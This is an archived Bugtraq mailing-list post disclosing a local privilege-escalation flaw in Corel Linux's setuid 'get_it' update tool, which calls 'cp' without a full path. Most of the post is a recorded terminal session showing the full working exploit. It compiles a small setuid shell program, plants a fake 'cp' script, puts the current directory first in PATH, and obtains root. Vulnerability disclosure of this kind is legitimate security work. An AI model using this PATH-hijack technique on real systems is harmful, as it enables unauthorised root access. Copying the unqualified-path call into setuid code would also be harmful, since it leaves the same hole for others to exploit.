Bugtraq mailing list archives

Serious Bug in Corel Linux.(Local root exploit)

From: tascon () ENETE GUI UVA ES (tascon () ENETE GUI UVA ES)
Date: Wed, 12 Jan 2000 09:26:49 +0100


   Corel Linux comes with a program called "Corel Update" to manage the
".deb" files. This X oriented program is setuid root. The program is
"get_it" and it's located in the /usr/X11R6/bin directory.

  If you can run it, it's easy to get root privileges in your system.
It copies two files to the temp directory, taking no care to verify how.
In fact, it calls the "cp" program WITHOUT THE WHOLE PATH!!

  The only thing you have to do to hack root, is to change your PATH
to execute your personal copy of the program.

  Let's see the example.
------------------------------ From here --------------------------------

Script started on Wed Jan 12 01:58:17 2000
CorelLinux:~$ id
uid=1001(tascon) gid=1001(tascon) groups=1001(tascon)
CorelLinux:~$ cat misu.c
#include <stdio.h>
#include <unistd.h>

main(argc,argv)
int argc;
char **argv;
{
if (argc==2);
setuid(atoi(argv[1]));
execlp("/bin/bash","/bin/bash",NULL);
}
CorelLinux:~$ cc -o misu misu.c
CorelLinux:~$ pwd
/home/tascon
CorelLinux:~$ cat cp
echo $1 $2 $3
/home/tascon/misu 0
CorelLinux:~$ export PATH=.:$PATH
CorelLinux:~$ get_it
/usr/X11R6/share/apps/get_it/html/largebanner.html /tmp/Get_It.0.a05872
CorelLinux:~# id
uid=0(root) gid=1001(tascon) groups=1001(tascon)
CorelLinux:~# exit
exit
/usr/X11R6/share/apps/get_it/html/smallbanner.html /tmp/Get_It.1.a05872
CorelLinux:~# id
uid=0(root) gid=1001(tascon) groups=1001(tascon)

Script done on Wed Jan 12 01:59:12 2000

---------------------------- To Here -----------------------------------

  Easy to patch, isn't it?

*****************************************************************************
                                       /    Cesar Tascon Alvarez
  ( to ) ? be : !be                   /       University of Valladolid
                                     /                        (Spain)
     W. Shakespeare                 /      tascon () gui uva es
                                   /
*****************************************************************************

Current thread:

*BSD procfs vulnerability, (continued)
- - - *BSD procfs vulnerability FEAR Advisories (Jan 21)
    - Re: *BSD procfs vulnerability Theo de Raadt (Jan 23)
    - stream.c/raped.c tests (just for stats) Vanja Hrustic (Jan 21)
    - Microsoft Security Bulletin (MS00-004) Microsoft Product Security (Jan 21)
    - Re: Vulnerabilities in Checkpoint FW-1 version 3.x and maybe 4.x Vanja Hrustic (Jan 22)
    - Re: Vulnerabilities in Checkpoint FW-1 version 3.x and maybe 4.x Markus Hofmann (Jan 22)
    - Administrivia Elias Levy (Jan 18)
    - Info on some security holes reported against SCO Unixware. Aaron Sigel (Jan 13)
    - ssh-proxy, a new approach to firewall software Magosanyi Arpad (Jan 13)
    - Re: Hotmail security hole - injecting JavaScript using <IMG Ajax (Jan 11)
    - Serious Bug in Corel Linux.(Local root exploit) tascon () ENETE GUI UVA ES (Jan 12)
    - secure-programs howto Signal 11 (Jan 09)
    - strace can lie ... but LTT might be handy Karim Yaghmour (Jan 09)
    - 2nd attempt: AIX techlibss follows links Klaus.Kusche () OOE GV AT (Jan 10)
    - NIS2k Bacano (Jan 11)
    - Password issue in Axent ESM 5.0.1 Console Todd (Jan 12)
    - Re: Password issue in Axent ESM 5.0.1 Console Scott Blake (Jan 14)
    - Local / Remote D.o.S Attack in Super Mail Transfer Package (SMTP) Server for WinNT Version 1.9x Ussr Labs (Jan 13)
    - Re: NIS2k Brad Griffin (Jan 13)
    - Misleading sense of security in Netscape Craig Ruefenacht (Jan 13)
    - Re: Misleading sense of security in Netscape Jefferson Ogata (Jan 18)

(Thread continues...)